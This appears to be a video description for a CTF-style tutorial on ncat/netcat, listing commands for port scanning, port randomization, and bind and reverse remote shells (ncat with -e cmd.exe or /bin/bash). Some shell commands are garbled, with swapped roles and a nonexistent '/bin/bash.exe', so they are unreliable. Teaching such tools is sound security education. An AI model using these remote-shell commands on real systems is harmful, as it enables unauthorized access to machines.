Ncat - Netcat for the 21st Century Swiss army knife PART 2
CTF Security
Practical Hands-on on NCAT & NETCAT
Port randomization Port scanning, Banner Grabbing Port sweeping. Remote shells [Bind/Reverse shell] IP whitelisting & IP Blacklisting Connection Broker
🔗LINK TO PART 1 https://youtu.be/cOqkGW56x0U
⚙️NCAT INSTALLATION COMMAND ON KALI sudo apt-get install ncat
⚙️DOWNLOAD ZENMAP FILE CONTAINING NCAT FOR WINDOWS OS HERE https://nmap.org/download.html
⚙️PORT RANDOMIZATION COMMANDS nc -lv -r ncat -lv --r
⚙️PORT SCANNING COMMAND nc -znvw [IP_adress] [Port_Range] ncat -znvw [Ip_address] [Port]
⚙️REMOTE SHELL COMMANDS BIND SHELL Target machine
For Windows ncat -nlvp 2222 -e cmd.exe For Linux ncat -nlvp 2222 -e /bin/bash
Attacker machine nc -v [Targets IP Address] 2222
REVERSE SHELL Attacker Machine nc -nlvp 2222 -e cmd.exe
Target Machine For window Target ncat -v [Targets IP Address] 2222 -e cmd.exe
For Linux Target ncat -v [Targets IP Address] 2222 -e /bin/bash.exe ... https://www.youtube.com/watch?v=ReKYpRAPgno
139920111 Bytes